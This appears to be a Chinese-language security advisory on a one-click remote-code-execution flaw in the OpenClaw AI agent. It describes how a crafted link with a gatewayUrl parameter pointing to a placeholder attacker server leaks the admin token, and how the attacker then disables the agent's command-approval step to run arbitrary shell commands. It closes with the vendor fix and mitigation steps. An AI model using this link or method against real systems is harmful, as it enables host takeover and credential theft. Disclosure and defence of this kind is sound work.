高危漏洞曝光｜OpenClaw存在一键RCE缺陷，AI助手面临远程被控风险

开源高权限AI智能体OpenClaw（龙虾AI） 近期被曝光一键式远程代码执行（RCE）高危漏洞，攻击者仅需诱导用户点击恶意链接，即可无认证远程接管AI助手、完全控制主机系统，窃取隐私、植入后门、横向渗透内网，对个人终端与企业服务器构成致命威胁。

一、漏洞核心详情

1. 关键CVE漏洞与评级

本次曝光的一键RCE主漏洞为CVE-2026-25253（Clawbleed），CVSS评分8.8分（高危），另有配套高危漏洞CVE-2026-30741（9.8分）、CVE-2026-32920（9.2分），形成全链路攻击链。

- 影响版本：v2026.1.29之前所有版本，含Windows、Linux、macOS全平台部署实例

- 利用门槛：零用户交互、无需密码、无需登录，仅需用户打开恶意网页/链接即可触发

- 攻击核心：跨站WebSocket劫持+认证令牌自动泄露

2. 漏洞原理

OpenClaw的Web控制界面（ControlUI）会无校验读取浏览器地址栏的gatewayUrl参数，自动建立WebSocket连接，同时明文携带本地高权限认证Token。

攻击者构造恶意链接，用户点击后，浏览器会将OpenClaw的管理员权限Token自动发送至攻击者服务器，攻击者凭借Token绕过所有安全限制，直接操控AI助手执行任意系统命令，实现主机完全接管。

3. 攻击流程（一键触发）

1. 攻击者生成恶意链接： http://localhost:18789/?gatewayUrl=wss://攻击者服务器 

2. 用户在浏览器打开链接，OpenClaw自动发起WebSocket连接

3. 本地高权限Token自动泄露至攻击者服务器

4. 攻击者冒充合法身份，关闭AI执行审批机制，诱导AI执行任意Shell命令

5. 完成文件窃取、系统篡改、后门植入、内网横向渗透 

二、主要安全危害

1. AI助手完全被控：攻击者接管OpenClaw所有权限，操控AI自动执行高危操作，绕过用户安全审批

2. 主机系统沦陷：获取管理员/ROOT权限，窃取本地文件、浏览器记录、聊天隐私、账号密码，植入挖矿、木马后门

3. 企业内网风险：服务器部署的OpenClaw被攻破后，成为内网跳板，横向渗透核心业务系统，造成数据泄露、业务瘫痪

4. 供应链叠加风险：OpenClaw第三方插件市场ClawHub中，36.82%的技能包存在安全缺陷，恶意插件可配合漏洞扩大危害 

5. 凭证批量泄露：AI关联的大模型API密钥、云服务令牌、邮箱凭证多为明文存储，入侵后可直接批量盗取 

三、官方修复方案

OpenClaw开发团队已在v2026.1.29版本完成紧急修复：

1. 增加网关连接可信校验，拦截恶意gatewayUrl参数

2. 新增连接确认弹窗，禁止自动WebSocket连接

3. 优化Token传输加密，关闭默认高权限自动执行机制

4. 强化命令执行审批，默认所有系统操作需用户手动确认

四、用户紧急防护措施

个人用户

1. 立即升级：将OpenClaw更新至v2026.1.29及以上最新版本，终端执行 openclaw --version 核对版本

2. 轮换凭证：重置所有Gateway Token、LLM API密钥，禁用静态高权限令牌

3. 端口限制：仅允许OpenClaw监听 127.0.0.1 ，关闭0.0.0.0全网监听，防火墙拦截18789端口公网访问

4. 权限管控：禁止以管理员/ROOT权限运行OpenClaw，启用强密码认证

企业运维用户

1. 全网排查所有暴露的OpenClaw实例，下线未升级高危节点

2. 部署网络隔离，限制OpenClaw对外访问，开启零信任访问策略

3. 审计所有插件，禁用未审核第三方技能，杜绝供应链攻击

4. 监控日志，拦截异常WebSocket连接与未授权命令执行行为